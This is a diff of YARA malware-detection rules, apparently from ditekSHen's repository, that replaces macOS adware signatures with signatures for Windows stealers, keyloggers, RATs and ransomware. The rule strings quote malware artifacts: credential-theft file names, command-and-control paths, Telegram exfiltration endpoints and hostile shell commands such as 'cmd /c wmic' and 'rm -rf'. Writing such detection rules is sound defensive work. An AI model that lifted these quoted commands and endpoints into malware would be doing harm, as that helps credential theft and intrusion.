ascii condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0x5a4d and ((( all of ($v1*) and 1 of ($h*)) or ($path and 2 of ($v1*) and 1 of ($h*)) or 10 of them ) or all of ($v2*)) } import "pe" -rule DITEKSHEN_MALWARE_Osx_Macsearch : FILE +rule DITEKSHEN_MALWARE_Win_Masslogger : FILE { meta: - description = "Detects MacSearch adware" + description = "MassLogger keylogger payload" author = "ditekSHen" - id = "facdf05c-5ee4-54c6-9ca3-01978af2b6e6" - date = "2024-09-06" - modified = "2024-09-06" + id = "9181b89a-2ce8-59b6-9703-c01a8471b8d6" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3071-L3092" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "973b7215fc8d04685a46d05b53b4092e7b81ed0d64d6982b534f2b89d0a59443" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L905-L934" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "7d8bbefa71a1eb20cd9d029bd516d6c37e39cfa053ed0617eace200d210d9b58" score = 75 - quality = 71 + quality = 73 tags = "FILE" strings: - $s1 = "open -a safari" ascii - $s2 = "/INDownloader" ascii - $s3 = "/safefinder" ascii - $s4 = "/INEncryptor" ascii - $s5 = "/INInstallerFlow" ascii - $s6 = "/INConfiguration" ascii - $s7 = "/INChromeAndFFSetter" ascii - $s8 = "/INSafariSetter" ascii - $s9 = "/bin/launchctl" fullword ascii - $s10 = "/usr/bin/csrutil" fullword ascii - $s11 = "_Tt%cSs%zu%.*s%s" fullword ascii - $s12 = "_Tt%c%zu%.*s%zu%.*s%s" fullword ascii - $s13 = "/macap/safefinder_Obf/safefinder/" ascii - $s14 = "/safefinder.build/Release/macsearch.build/" ascii + $s1 = "MassLogger v" ascii wide + $s2 = "MassLogger Started:" ascii wide + $s3 = "MassLogger Process:" ascii wide + $s4 = "/panel/upload.php" wide + $s5 = "ftp://" wide + $s6 = "\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" fullword wide + $s7 = "^(.*/)?([^/\\\\.]+/\\\\.\\\\./)(.+)$" fullword wide + $s8 = "Bot Killer" ascii + $s9 = "Keylogger And Clipboard" ascii + $c1 = "costura.ionic.zip.reduced.dll.compressed" fullword ascii + $c2 = "CHECKvUNIQUEq" fullword ascii + $c3 = "HOOK/MEMORY6" fullword ascii + $c4 = "Massfile" ascii wide + $c5 = "Fz=[0-9]*'skips*" fullword ascii + $c6 = ":=65535zO" fullword ascii + $c7 = "!$!%!&!'!(!)!*!.!/!0!4!" fullword ascii + $c8 = "5!9!:!<!>!@!E!G!J!K!L!N!O!P!`!" fullword ascii + $c9 = "dllToLoad" fullword ascii + $c10 = "set_CreateNoWindow" fullword ascii + $c11 = "FtpWebRequest" fullword ascii + $c12 = "encryptedUsername" fullword ascii + $c13 = "encryptedPassword" fullword ascii condition: - uint16(0)==0xfacf and 10 of them + ( uint16(0)==0x5a4d and 9 of ($c*)) or (5 of ($s*) or 9 of ($c*)) } import "pe" -rule DITEKSHEN_MALWARE_Osx_Genieo : FILE +rule DITEKSHEN_MALWARE_Win_Echelon : FILE { meta: - description = "Detects LinqurySearch/Genieo adware" + description = "Echelon information stealer payload" author = "ditekSHen" - id = "ac44eefd-bf1c-5d4b-bcd4-9a5d394ac1d3" - date = "2024-09-06" - modified = "2024-09-06" + id = "e13d2003-c755-5dd3-bb16-8e41dd19a151" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3094-L3112" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "951dc8539435a52d9eea00b3fdaf98cf618c03867066819f2f9244165e57c675" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L936-L957" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "c070bf52cc51dd334ea24614e33eaa2b7b1a17e7790e586cbbb8c7e33ba1bd76" score = 75 quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Osx.Trojan.Genieo" strings: - $s1 = "<key>com.apple.security.get-task-allow</key>" fullword ascii - $s2 = "U1QQFXAfCxAfRUNCH1JZXh9" ascii - $s3 = "XVFTQ1VRQlNYH" ascii - $s4 = "dF9HXlxfUVQQVUJCX0IQHRB" ascii - $s5 = "Value:forHTTPHeaderField:" ascii - $s6 = "postContent:::" fullword ascii - $s7 = "postLog:" fullword ascii - $s8 = "initWithBase64EncodedString:options:" fullword ascii - $s9 = "do shell script \"%@\" with administrator privileges" fullword ascii - $s10 = /LinqurySearch-[a-f0-9]{40,}/ + $s1 = "<GetStealer>b__" ascii + $s2 = "clearMac" fullword ascii + $s3 = "path2save" fullword ascii + $s4 = "Echelon_Size" fullword ascii + $s5 = "Echelon Stealer by" wide + $s6 = "get__masterPassword" fullword ascii + $s7 = "DomainDetect" fullword ascii + $s8 = "[^\\u0020-\\u007F]" fullword wide + $s9 = "/sendDocument?chat_id=" wide + $s10 = "//setting[@name='Password']/value" wide + $s11 = "Passwords_Mozilla.txt" fullword wide + $s12 = "Passwords_Edge.txt" fullword wide + $s13 = "@madcod" ascii wide + $pdb = "\\Echelon-Stealer-master\\obj\\Release\\Echelon.pdb" ascii condition: - uint16(0)==0xfacf and 6 of them + ( uint16(0)==0x5a4d and (8 of ($s*) or $pdb)) or (8 of ($s*) or $pdb) } import "pe" -rule DITEKSHEN_MALWARE_Osx_AMCPCVARK : FILE +rule DITEKSHEN_MALWARE_Win_Qulab { meta: - description = "Detects OSX TechyUtils/PCVARK adware" + description = "Qulab information stealer payload or artifacts" author = "ditekSHen" - id = "1378364b-db10-5194-98f8-5347504a92e6" - date = "2024-09-06" - modified = "2024-09-06" + id = "6ae24c67-5700-5330-a3bd-d542162faebb" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3114-L3139" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b18a9f578af98feb5107d9ef85850457ba5921ab58af7b097a815e3af74f05f7" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L959-L983" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "659d828cbef38c6362b612be9bdc05ae820f49c23684e77af6462ea677133284" score = 75 quality = 75 - tags = "FILE" - clamav_sig = "MALWARE.Osx.Adware.AMC-PCVARK-TechyUtils" + tags = "" + clamav_sig = "MALWARE.Win.Trojan.QulabZ-Stealer" strings: - $s1 = "Mac Auto Fixer.app" fullword ascii - $s2 = "com.techyutil.macautofixer" fullword ascii - $s3 = "com.findApp.findApp" ascii - $s4 = "Library/Preferences/%@.plist" fullword ascii - $s5 = "Library/%@/%@" fullword ascii - $s6 = "Library/Application Support/%@/%@" fullword ascii - $s7 = "sleep 3; rm -rf \"%@\"" fullword ascii - $s8 = "Silently calling url: %@" ascii - $cnc1 = "cloudfront.net/getdetails" ascii - $cnc2 = "trk.entiretrack.com/trackerwcfsrv/tracker.svc/trackOffersAccepted/?" ascii - $cnc3 = "pxl=%@&x-count=1&utm_source=%@&lpid=0&utm_content=&utm_term=&x-base=&utm_medium=%@&utm_publisher=%@&offerpxl=&x-fetch=1&utm_campaign=@&affiliateid=&x-at=&btnid=" ascii - $x1 = "mafsysinfo" fullword ascii - $x2 = "MAF4497_MAF4399_MAF2204" ascii - $developerid = "Developer ID Application: Rahul Gahlot (RZ74UYT742)" ascii + $x1 = "QULAB CLIPPER + STEALER" ascii wide + $x2 = "MASAD CLIPPER + STEALER" ascii wide + $x3 = "http://teleg.run/Qulab" ascii wide + $x4 = "http://teleg.run/jew_seller" ascii wide + $x5 = "BUY CLIPPER + STEALER" ascii wide + $s1 = "\\Screen.jpg" ascii wide + $s2 = "attrib +s +h \"" ascii wide + $s3 = "\\x86_microsoft-windows-" ascii wide + $s4 = "\\amd64_microsoft-windows-" ascii wide + $s5 = "Desktop TXT File" ascii wide + $s6 = "\\AutoFills.txt" ascii wide + $s7 = "\\CreditCards.txt" ascii wide + $s8 = "a -y -mx9 -ssw" ascii wide + $s9 = "\\Passwords.txt" ascii wide + $s10 = "\\Information.txt" ascii wide + $s11 = "\\getMe" ascii wide condition: - uint16(0)==0xfacf and (6 of ($s*) or 2 of ($cnc*) or all of ($x*) or $developerid) + 9 of them or ((1 of ($x*) and 4 of ($s*)) or 1 of ($x*)) } import "pe" -rule DITEKSHEN_MALWARE_Osx_Realtimespy : FILE +rule DITEKSHEN_MALWARE_Win_Orion : FILE { meta: - description = "Detects macOS RealtimeSpy monitoring app" + description = "Orion Keylogger payload" author = "ditekSHen" - id = "6485abf3-896c-54cd-ad84-7bd86456e47b" - date = "2024-09-06" - modified = "2024-09-06" + id = "b380b93b-6ceb-5244-aeca-b1f8f9a5b553" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3141-L3166" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "4ef2e1b8d34962cd3eab23f401b764b38b8332233aa2ae91b218af499d8ab8ff" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L985-L1005" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "9e5521ebaf9bdef6dadd2a2a093bd6f87ded023d9a74db126ac8ec9a5f1f9744" score = 75 - quality = 57 + quality = 73 tags = "FILE" - clamav_sig = "MALWARE.Osx.Trojan.RealtimeSpy" strings: - $x1 = "SPYAGENT4HASHCIPHER" fullword ascii - $x2 = ":username:password:acctid:compUser:compName:" ascii - $x3 = ":username:password:acctid:compName:" ascii - $x4 = "://www.realtime-spy-mac.com/" ascii - $x5 = "/Users/spytech/" ascii - $x6 = "shell script \"touch /private/var/db/.AccessibilityAPIEnabled\" password \"pwd\" with administrator privileges" ascii - $x7 = "Content-Disposition: form-data; name=\"raptor_" ascii - $c1 = "_OBJC_CLASS_$_LocationLogger" fullword ascii - $c2 = "_OBJC_CLASS_$_MonitoringFunctions" fullword ascii - $c3 = "_OBJC_CLASS_$_ProcessLogger" fullword ascii - $c4 = "_OBJC_CLASS_$_RealtimeLoggingFunctions" fullword ascii - $c5 = "_OBJC_CLASS_$_Realtime_SpyAppDelegate" fullword ascii - $c6 = "_OBJC_CLASS_$_ScreenshotLogger" fullword ascii - $c7 = "_OBJC_CLASS_$_Uploader" fullword ascii - $c8 = "_OBJC_CLASS_$_UsageLogger" fullword ascii - $c9 = "_OBJC_CLASS_$_WebsiteLogger" fullword ascii + $s1 = "\\Ranger.BrowserLogging" ascii wide nocase + $s2 = "GrabAccounts" fullword ascii + $s3 = "DownloadFile" fullword ascii + $s4 = "Internet Explorer Recovery" wide + $s5 = "Outlook Recovery" wide + $s6 = "Thunderbird Recovery" wide + $s7 = "Keylogs -" wide + $s8 = "WebCam_Capture.dll" wide + $s9 = " is not installed on this computer!" wide + $s10 = "cmd /c bfsvc.exe \"" wide + $s11 = "/Keylogs - PC:" fullword wide + $s12 = "/PC:" fullword wide + $s13 = "<p style=\"color:#CC7A00\">[" wide condition: - uint16(0)==0xfacf and (2 of ($x*) or 2 of ($c*)) + ( uint16(0)==0x5a4d and 5 of ($s*)) or (6 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Osx_Maxofferdeal : FILE +rule DITEKSHEN_MALWARE_Win_Aspire : FILE { meta: - description = "Detects macOS MaxOfferDeal adware" + description = "Aspire Keylogger payload" author = "ditekSHen" - id = "aec4ab77-7025-5856-99fb-aa7b86413c00" - date = "2024-09-06" - modified = "2024-09-06" + id = "25724975-f373-553e-b27e-43168e956c16" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3168-L3187" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "a9788b2049ae7f345760a078b2932e79fe8fc0dd71e0446c213df64480c3e3d6" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1007-L1022" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "3ea0136dbacb79e4c7556f562d17b26b84ac3e4c967b117021e2399ded0a0fdf" score = 75 - quality = 46 + quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Osx.Adware.MaxOfferDeal" strings: - $s1 = "clEvE15obfuscated_data" ascii - $s2 = "%.*s.%.*s" fullword ascii - $s3 = "_Tt%cSs%zu%.*s%s" fullword ascii - $s4 = "_Tt%c%zu%.*s%zu%.*s%s" fullword ascii - $s5 = "__ZL20tFirefoxProfilesPath" ascii - $s6 = "__ZL22tFirefoxSearchFileName" ascii - $s7 = "__ZL37tFirefoxDefaultProfileFolderExtension" ascii - $s8 = "__ZL21tFirefoxPrefsFileName" ascii - $s9 = "__GLOBAL__sub_I_Firefox.mm" ascii - $s10 = "add_image_hook_" ascii - $s11 = "/Library/Caches/com.apple.xbs/Sources/arclite/arclite-66/source/" fullword ascii + $s1 = "AspireLogger -" wide + $s2 = "Application: @" wide + $s3 = "encryptedUsername" wide + $s4 = "encryptedPassword" wide + $s5 = "Fetch users fron logins" wide + $s6 = "URI=file:" wide + $s7 = "signons.sqlite" wide + $s8 = "logins.json" wide condition: - uint16(0)==0xfacf and all of them + ( uint16(0)==0x5a4d and 6 of ($s*)) or (7 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Osx_Windtrail : FILE +rule DITEKSHEN_MALWARE_Win_S05Kitty : FILE { meta: - description = "Detects WindTrail OSX trojan" + description = "Sector05 Kitty RAT payload" author = "ditekSHen" - id = "abf7cd20-b37d-5d0a-8f3f-f4e491965713" - date = "2024-09-06" - modified = "2024-09-06" + id = "3261f6b6-21e7-5195-98db-9607ba530572" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3189-L3206" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "291f919cb1e8c4b33960dd3f2c842b9efec04852bd5661543e3ee60bc0fc5ba6" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1024-L1045" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "df2930694671c9ca16f2afeb799704647c9acf32be118706c342347ffe8ceb36" score = 75 - quality = 73 + quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Osx.Trojan.WindTrail" strings: - $s1 = "m_ComputerName_UserName" fullword ascii - $s2 = "m_uploadURL" fullword ascii - $s3 = "m_logString" fullword ascii - $s4 = "GenrateDeviceName" fullword ascii - $s5 = "open -a" fullword ascii - $s6 = "AESEncryptFile:toFile:usingPassphrase:error:" fullword ascii - $s7 = "scheduledTimerWithTimeInterval:target:selector:userInfo:repeats:" fullword ascii - $s8 = "_kLSSharedFileListSessionLoginItems" fullword ascii - $developerid = "Developer ID Application: warren portman (95RKE2AA8F)" ascii + $s1 = "Execute Comand" ascii + $s2 = "InjectExplorer" ascii + $s3 = "targetProcess = %s" fullword ascii + $s4 = "Process attach (%s)" fullword ascii + $s5 = "process name: %s" fullword ascii + $s6 = "cmd /c %s >%s" fullword ascii + $s7 = "CmdDown: %s, failed" fullword ascii + $s8 = "http://%s%s/%s" fullword ascii + $s9 = "tmp.LOG" fullword ascii + $x1 = "zerodll.dll" fullword ascii + $x2 = "OneDll.dll" fullword ascii + $x3 = "kkd.bat" fullword ascii + $x4 = "%s\\regsvr32.exe /s \"%s\"" fullword ascii + $x5 = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\fontchk.jse" fullword ascii condition: - uint16(0)==0xfacf and ( all of ($s*) or $developerid) + uint16(0)==0x5a4d and (8 of ($s*) or all of ($x*)) } import "pe" -rule DITEKSHEN_MALWARE_Osx_Techyutils : FILE +rule DITEKSHEN_MALWARE_Win_Fakewmi : FILE { meta: - description = "Detects TechyUtils OSX packages" + description = "FakeWMI payload" author = "ditekSHen" - id = "59fd4165-987f-5b68-9341-d78184b25a1c" - date = "2024-09-06" - modified = "2024-09-06" + id = "689bc207-2bc6-50de-80d6-d1ba0a26b264" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3208-L3224" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "071c67cace09dd66233bd4c4dd78c32d0f39f7e38dc06ec62e09fef67762d098" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1047-L1064" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "627886cdd01f5f02e454ef284c77c87eb027ee33f6a51536758fb7f095271a40" score = 75 - quality = 73 + quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Osx.Trojan.TechyUtils" + clamav_sig = "MALWARE.Win.Trojan.Fakewmi" strings: - $s1 = "__ZL58__arclite_NSMutableDictionary__" ascii - $s2 = "__ZL46__arclite_NSDictionary_" ascii - $s3 = "<key>com.apple.security.get-task-allow</key>" fullword ascii - $s4 = "/productprice.svc/GetCountryCode" ascii - $s5 = "@_pthread_mutex_lock" fullword ascii - $s6 = "_mh_execute_header" fullword ascii - $s7 = "/Users/prasoon/Documents/" ascii - $developerid = "Developer ID Application: Techyutils Software Private Limited (VS9Q8BRRRJ)" ascii + $s1 = "-BEGIN RSA PUBLIC KEY-" ascii + $s2 = ".exe|" ascii + $s3 = "cmd /c wmic " ascii + $s4 = "cmd /c sc " ascii + $s5 = "schtasks" ascii + $s6 = "taskkill" ascii + $s7 = "findstr" ascii + $s8 = "netsh interface" ascii + $s9 = "CreateService" ascii condition: - uint16(0)==0xfacf and ( all of ($s*) or $developerid) + uint16(0)==0x5a4d and ( all of ($s*) and #s2>10) } import "pe" -rule DITEKSHEN_MALWARE_Win_Dlagent04 : FILE +rule DITEKSHEN_MALWARE_Win_Baldr : FILE { meta: - description = "Detects known downloader agent downloading encoded binaries in patches from paste-like websites, most notably hastebin" + description = "Baldr payload" author = "ditekSHen" - id = "d591c591-aecc-557e-85b4-1e2589fbfbf9" - date = "2024-09-06" - modified = "2024-09-06" + id = "cdc35a11-a97b-5e21-929e-01fed5172b55" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3247-L3263" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "73e6af7c32d38ec5d1d2bc9f2517860367b46779b53e0faff8885b655561ab01" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1066-L1083" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "f8e97fd618209bc6ce609b60b1e1f1e359be7678474fad3b18a529487c64cd99" score = 75 - quality = 75 + quality = 73 tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.DLAgent04" + clamav_sig = "MALWARE.Win.Trojan.Baldr" strings: - $x1 = "@@@http" ascii wide - $s1 = "HttpWebRequest" fullword ascii - $s2 = "GetResponseStream" fullword ascii - $s3 = "set_FileName" fullword ascii - $s4 = "set_UseShellExecute" fullword ascii - $s5 = "WebClient" fullword ascii - $s6 = "set_CreateNoWindow" fullword ascii - $s7 = "DownloadString" fullword ascii + $x1 = "BALDR VERSION : {0}" fullword wide + $x2 = "Baldr" fullword ascii wide + $x3 = "{0}\\{1:n}.exe" fullword wide + $x4 = ".doc;.docx;.log;.txt;" fullword wide + $s1 = "<GetMAC>b__" ascii + $s2 = "<ExtractPrivateKey3>b__" ascii + $s3 = "UploadData" fullword ascii + $s6 = "get_NetworkInterfaceType" fullword ascii + $s5 = "get_Passwordcheck" fullword ascii condition: - uint16(0)==0x5a4d and filesize <300KB and #x1>1 and 4 of ($s*) + ( uint16(0)==0x5a4d and all of ($x*)) or (2 of ($x*) and 4 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Gdriverat : FILE +rule DITEKSHEN_MALWARE_Win_Megumin : FILE { meta: - description = "Detects GDriveRAT" + description = "Megumin payload" author = "ditekSHen" - id = "29e46280-39d1-5d49-ab0d-0a32398b30f0" - date = "2024-09-06" - modified = "2024-09-06" + id = "bb1743f7-0bd8-5c0a-ad78-c4747904204f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3265-L3284" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "134e66d0afc90e7fbab2c9dd034f85eb504903481e12c1ab8d7bab9321da817a" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1085-L1108" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "fb4934814c45d2465b6e1589c3b489116343ca0c17ebb916b5c9247fc676c74d" score = 75 quality = 50 tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.GDriveRAT" + clamav_sig = "MALWARE.Win.Trojan.Megumin" strings: - $h1 = "https://www.googleapis.com/upload/drive/v3/files?uploadType=multipart" fullword wide - $h2 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" fullword wide - $h3 = "multipart/related; boundary=\"boundary_tag\"" fullword wide - $h4 = "https://www.googleapis.com/drive/v3/files" fullword wide - $s1 = "move gdrive.exe \"C:\\Users\\" fullword wide - $s2 = "file_data" fullword ascii - $s3 = "comp_id" fullword ascii - $s4 = "file_name" fullword ascii - $s5 = "refresh_token" fullword ascii - $s6 = "commands" fullword ascii - $s7 = "execute" fullword ascii + $s1 = "loadpe|" fullword ascii + $s2 = "Megumin/2.0" fullword ascii + $s3 = "/c start /I \"\" \"" fullword ascii + $s4 = "jsbypass|" fullword ascii + $cnc1 = "Mozilla/5.0 (Windows NT 6.1) Megumin/2.0" fullword ascii + $cnc2 = "/cdn-cgi/l/chk_jschl?s=" fullword ascii + $cnc3 = "/newclip?hwid=" fullword ascii + $cnc4 = "/isClipper" fullword ascii + $cnc5 = "/task?hwid=" fullword ascii + $cnc6 = "/completed?hwid=" fullword ascii + $cnc7 = "/gate?hwid=" fullword ascii + $cnc8 = "/addbot?hwid=" fullword ascii + $pdb = "\\MeguminV2\\Release\\MeguminV2.pdb" ascii condition: - uint16(0)==0x5a4d and 3 of ($h*) and 5 of ($s*) + ( uint16(0)==0x5a4d and ( all of ($s*) or 5 of ($cnc*) or $pdb)) or 11 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_STOP : FILE +rule DITEKSHEN_MALWARE_Win_Rietspoof : FILE { meta: - description = "Detects STOP ransomware" + description = "Rietspoof payload" author = "ditekSHen" - id = "e928d917-a9d9-5830-938a-59b62608e84c" - date = "2024-09-06" - modified = "2024-09-06" + id = "b2d94705-ca59-56ae-8471-2c6895d355dc" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3286-L3309" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "61f7e7c1139c56088b2f58b78ae132ffcfef0f931c15b67ea775b0d5e51d189d" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1110-L1140" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "d1d9baab83c904d1e8dcd7aeacdabfc79c1acee67006793c2240a42ebf9c62b2" score = 75 quality = 73 tags = "FILE" - snort2_sid = "920113" - snort3_sid = "920111" - clamav_sig = "MALWARE.Win.Ransomware.STOP" + clamav_sig = "MALWARE.Win.Trojan.Rietspoof" strings: - $x1 = "C:\\SystemID\\PersonalID.txt" fullword wide - $x2 = "/deny *S-1-1-0:(OI)(CI)(DE,DC)" wide - $x3 = "e:\\doc\\my work (c++)\\_git\\encryption\\" ascii wide nocase - $s1 = "\" --AutoStart" fullword ascii wide - $s2 = "--ForNetRes" fullword wide - $s3 = "--Admin" fullword wide - $s4 = "%username%" fullword wide - $s5 = "?pid=" fullword wide - $s6 = /&first=(true|false)/ fullword wide - $s7 = "delself.bat" ascii - $mutex1 = "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}" fullword ascii - $mutex2 = "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}" fullword ascii - $mutex3 = "{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}" fullword ascii + $c1 = "%s%s%s USER: user" fullword ascii + $c2 = "cmd /c %s" fullword ascii + $c3 = "CreateObject(\"Scripting.FileSystemObject\").DeleteFile(" ascii + $c4 = "WScript.Quit" fullword ascii + $c5 = "CPU: %s(%d)" fullword ascii + $c6 = "RAM: %lld Mb" fullword ascii + $c7 = "data.dat" fullword ascii + $c8 = "%s%s%s USER:" ascii + $v1_1 = ".vbs" ascii + $v1_2 = "HELLO" ascii + $v1_3 = "Wscript.Sleep" ascii + $v1_4 = "User-agent:Mozilla/5.0 (Windows; U;" ascii + $v2_1 = "Xjoepxt!" ascii + $v2_2 = "Content-MD5:%s" fullword ascii + $v2_3 = "M9h5an8f8zTjnyTwQVh6hYBdYsMqHiAz" fullword ascii + $v2_4 = "GET /%s?%s HTTP/1.1" fullword ascii + $v2_5 = "GET /?%s HTTP/1.1" fullword ascii + $pdb1 = "\\techloader\\loader\\loader.odb" ascii wide + $pdb2 = "\\loader\\Release\\loader_v1.0.pdb" ascii wide condition: - uint16(0)==0x5a4d and ((2 of ($x*) and 1 of ($mutex*)) or ( all of ($x*)) or (6 of ($s*) and (1 of ($x*) or 1 of ($mutex*))) or (9 of them )) + uint16(0)==0x5a4d and (7 of ($c*) and (3 of ($v*) or 1 of ($pdb*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Parallaxrat : FILE +rule DITEKSHEN_MALWARE_Win_Modirat : FILE { meta: - description = "Detects ParallaxRAT" + description = "MoDiRAT payload" author = "ditekSHen" - id = "e602b28f-ae5d-52af-b1c5-5c41776dd4c5" - date = "2024-09-06" - modified = "2024-09-06" + id = "8b641c7a-5ebd-50e7-83cb-e408683c456b" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3311-L3328" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "7fd94dee44079b595b906f1687f44b51b8cebabbeb0900563b8d4fcc0e46bdd0" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1142-L1158" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "d0760e9dab7e9c0affb2193ea249feea8bb58e519522ca2a562f015059ad5590" score = 75 quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.ParallaxRAT" strings: - $s1 = "[Clipboard End]" fullword wide - $s2 = "[Ctrl +" fullword wide - $s3 = "[Alt +" fullword wide - $s4 = "Clipboard Start" wide - $s5 = "(Wscript.ScriptFullName)" wide - $s6 = "CSDVersion" fullword ascii - $s7 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" fullword ascii 